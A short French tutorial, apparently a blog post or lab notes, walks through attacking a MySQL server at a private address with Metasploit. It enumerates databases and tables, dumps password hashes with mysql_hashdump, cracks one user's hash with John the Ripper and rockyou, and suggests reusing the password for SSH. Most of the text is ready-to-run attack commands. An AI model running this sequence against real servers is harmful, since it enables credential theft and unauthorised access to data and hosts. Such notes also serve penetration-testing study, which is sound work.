Énumération du service MySQL avec metasploit

On peut utiliser msfconsole pour exécuter des requêtes sur un serveur MYSQL


use auxiliary/admin/mysql/mysql_sql
set rhosts 10.9.0.15
set username root
set password password
run #la requête par défault est "select version()"
set sql show databases
run

Énumération des tables


use auxiliary/scanner/mysql/mysql_schemadump
set rhosts 10.9.0.15
set username root
set password password
run

Énumération des usagers et des hash des mots de passe


use scanner/mysql/mysql_hashdump
set rhosts 10.9.0.15
set username root
set password password
run

Par la suite, on peut mettre le hash à cracker dans un fichier hash.txt

germain:*EA031893AA21444B170FC2162A56978B8CEECE18


john -wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Peut-être que le mot de passe est le même que celui pour seconnecter en SSH ?

Leave a Reply